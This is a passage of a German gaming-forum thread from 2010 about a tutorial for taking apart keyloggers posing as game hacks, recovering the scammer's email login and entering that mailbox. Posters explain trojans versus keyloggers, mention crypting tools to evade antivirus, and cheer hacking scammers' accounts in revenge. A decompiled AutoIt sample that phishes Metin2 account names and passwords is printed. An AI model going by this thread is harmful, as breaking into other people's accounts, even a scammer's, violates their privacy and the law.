[How2] Keylogger auseinander nehmen + in Mail einloggen

09/05/2010 16:16 THEGO90#31
was ich jedoch glaub ich nich kapier....

die email ....welche email ist das ?
ist das die email wo der trojaner dann die passwörter auf die mainemail schickt ? oder wie
09/05/2010 16:24 BoGaRaM#32
Ehh Keylogger und Trojaner sind eig. schon sehr unterschiedlich :D
Der Trojaner braucht einen Server und einen Client.

Der Client wäre die Datei die derjenige User ausführt, wenn der Client dann mit den
Server in Verbindung steht, kann er problemlos Sachen am PC machen (firerwall ausschalten.. alle Pw zu einem schicken ) und er Benutzer selber, merkt am PC gar nichts.

Beim Keylogger, hat man eine Datei, die der Benutzer Ausführt, und dann die Daten manuell eintippt.. die eingetippten Daten gehen dann zu einer bestimmten E-mail.

So..^^
Aber, trojaner werden heute oft noch von Antiviren programme erkannt und deswegen bevorzugen die meisten halt Keylogger und Hoffen auf die "dummheit" der leute :D
09/05/2010 16:27 THEGO90#33
Quote:
Originally Posted by BoGaRaM View Post
Ehh Keylogger und Trojaner sind eig. schon sehr unterschiedlich :D
Der Trojaner braucht einen Server und einen Client.

Der Client wäre die Datei die derjenige User ausführt, wenn der Client dann mit den
Server in Verbindung steht, kann er problemlos Sachen am PC machen (firerwall ausschalten.. alle Pw zu einem schicken ) und er Benutzer selber, merkt am PC gar nichts.

Beim Keylogger, hat man eine Datei, die der Benutzer Ausführt, und dann die Daten manuell eintippt.. die eingetippten Daten gehen dann zu einer bestimmten E-mail.

So..^^
Aber, trojaner werden heute oft noch von Antiviren programme erkannt und deswegen bevorzugen die meisten halt Keylogger und Hoffen auf die "dummheit" der leute :D
ok das hab ich verstanden^^
aber wofür brauchn der keylogger das passwort der email..ich meine er muss es ja nur zu einer email hinschicken und nicht einloggen oder ?°^^
09/05/2010 16:29 BoGaRaM#34
Hmm..
Also, Theoretisch so schon^^
Aber ich denke, dass die Programme sich dann wohl "Einloggen" und die Daten dort abspeichern.. also den Genauen Pfad hat mich eig. noch gar nicht beschäftigt :D

Aber E-mail + PW ist eig. immer dabei :D
09/05/2010 18:56 Jonni8#35
Ich finde das Tut auch sehr nice :handsdown::)
Aber iwo krieg ich denn mal so ein paar simple zum testen her? xD
Ich finde keine^^

--> Von mir aus auch per PN sagen
09/05/2010 19:43 Kanachri#36
thx nettes tut :>
(guckt in die kommentare :>)
Wenn ich mal zeit hab werd ich den ganzen tag damit verbringen damit diese penner mal wissen wie es ist, z.B seine emailadresse etc. zu verlieren.
09/05/2010 20:20 THEGO90#37
haha ich würd eiskalt deren accs "hacken" ....würd mich garnet jucken solche typen habendas verdient...
09/05/2010 21:46 buggiwmum#38
Ein Keylogger kenzeichnet aber automatisch alle Tastenanschläge auf... Man muss nicht manuell etwas eingeben.
Hier mal die Definition von Antivir:
Quote:
Ein Keylogger (zu Deutsch: „Tasten-Rekorder") ist eine Hard- oder Software, welche die Fähigkeit besitzt, alle Eingaben eines Anwenders mitzuprotokollieren und dadurch zu überwachen oder zu rekonstruieren. So können geheime persönliche Daten, z. B. Passwörter oder PINs, ausspioniert und über das Internet zu anderen Computer gesendet werden.
09/06/2010 04:11 Piw0r#39
hab jetzt locker 6 kaylogger oder what ever geladen und immer noch nichts gefunden..
09/06/2010 06:39 quivar#40
Zur info:

Die keylogger, bzw der hacker, muss nicht zwingend alles auf seinem FTP geladen haben, bzw die daten müssen NICHT dorthin versand werden!

Denn, Trojaner sind Remote tools, die auf dem rechner vom hacker liegen, heißt, ihr seid infiziert, der hacker schmeißt seinen keylogger an und sieht LIVE was ihr tippt, einige trojaner clienten haben sogar nen offline keylogger (sollte sich von selbst erklären).

Ihr könnt also nicht jeden x-beliebigen virus auseinandernehmen in der hoffnung ihr findet was ;)

Wollte ich nur mal eben anmerken :)
09/06/2010 08:02 .SpecialZ##41
Quote:
Originally Posted by quivar View Post
Zur info:

Die keylogger, bzw der hacker, muss nicht zwingend alles auf seinem FTP geladen haben, bzw die daten müssen NICHT dorthin versand werden!

Denn, Trojaner sind Remote tools, die auf dem rechner vom hacker liegen, heißt, ihr seid infiziert, der hacker schmeißt seinen keylogger an und sieht LIVE was ihr tippt, einige trojaner clienten haben sogar nen offline keylogger (sollte sich von selbst erklären).

Ihr könnt also nicht jeden x-beliebigen virus auseinandernehmen in der hoffnung ihr findet was ;)

Vollkommnend richtig.

Wer seine Tools vernünftig Crypted hat keinerlei Probleme mit solchen angelegenheiten.

Sollte irgendwer von euch mit irgendwas infiziert sein, dann schickt mir die Datei via. PN, und ich liefere euch die "Daten" des Skiddos. :)
09/06/2010 16:25 BoGaRaM#42
Quote:
Originally Posted by quivar View Post
Zur info:

Stimmt auch wiederum :D
Also, wirklich alle bekommt auch nicht "Auseinander.."

Aber die Trojaner dürfen wir hierbei jetzt nicht anspielen^^
denn dort wird Server und Client und noch viele andere Sachen verwendet, die es einen nicht sehr leicht machen (zudem oft auch die Daten eher verseucht sind)

Normalerweise sollte das ganze auch im Metin bereich liegen, weil dort die meisten Leute mit ihren Möchtegern "hacks" ankommen und man halt so mit einen gegen angriff starten könnte ;)

Nun ja :D aber wems helft,das ganze ist auch nur 1 Möglichkeit, es gibt noch sehr viele andere :D
09/06/2010 16:56 aljosha123#43
1. kannste mir helfen und mich in skype(Skypevader 5) oder msn adden ([Only registered and activated users can see links. Click Here To Register...])
2.ich habe grade nen autoit keylogger habe ihn decompiled und da kam das raus
$ID=INPUTBOX("Yanghack x4.0","Geb hier bitte deinen Accountnamen ein")
$PW=INPUTBOX("Yanghack x4.0","Geb hier dein Passwort ein","","*")
INPUTBOX("Yanhack x4.0","Yang Anzahl")
WHILE 1
SLEEP(1000)
SEND($ID)
SEND("[ENTER]")
SEND($PW)
SEND("[ENTER]")
WEND

kannste mir jetzt sagen warum da 1.der rest es code nicht steht(gui und so) und 2.warum die e-mail da nicht steht :D

Edit:das mit dem rest des codes (gui und so) hat sich erlidegt bleibt noch das andere
problem!!!

Mfg Joshi
09/06/2010 17:20 boxxiebabee#44
Weiß jetzt nicht ob das schon genannt wurde, aber finde NET.Reflector wesentlich besser als nen Hex-Editor für sowas :<
09/06/2010 17:27 ●ROBBY●#45
Quote:
Originally Posted by aljosha123 View Post
1. kannste mir helfen und mich in skype(Skypevader 5) oder msn adden ([Only registered and activated users can see links. Click Here To Register...])
2.ich habe grade nen autoit keylogger habe ihn decompiled und da kam das raus
$ID=INPUTBOX("Yanghack x4.0","Geb hier bitte deinen Accountnamen ein")
$PW=INPUTBOX("Yanghack x4.0","Geb hier dein Passwort ein","","*")
INPUTBOX("Yanhack x4.0","Yang Anzahl")
WHILE 1
SLEEP(1000)
SEND($ID)
SEND("[ENTER]")
SEND($PW)
SEND("[ENTER]")
WEND

kannste mir jetzt sagen warum da 1.der rest es code nicht steht(gui und so) und 2.warum die e-mail da nicht steht :D

Edit:das mit dem rest des codes (gui und so) hat sich erlidegt bleibt noch das andere
problem!!!

Mfg Joshi
Dass ist nen ganz billiges Ding drr schreiebt die Daten einfach in den Chat von Metin2, nix mit E-Mail order sonst was.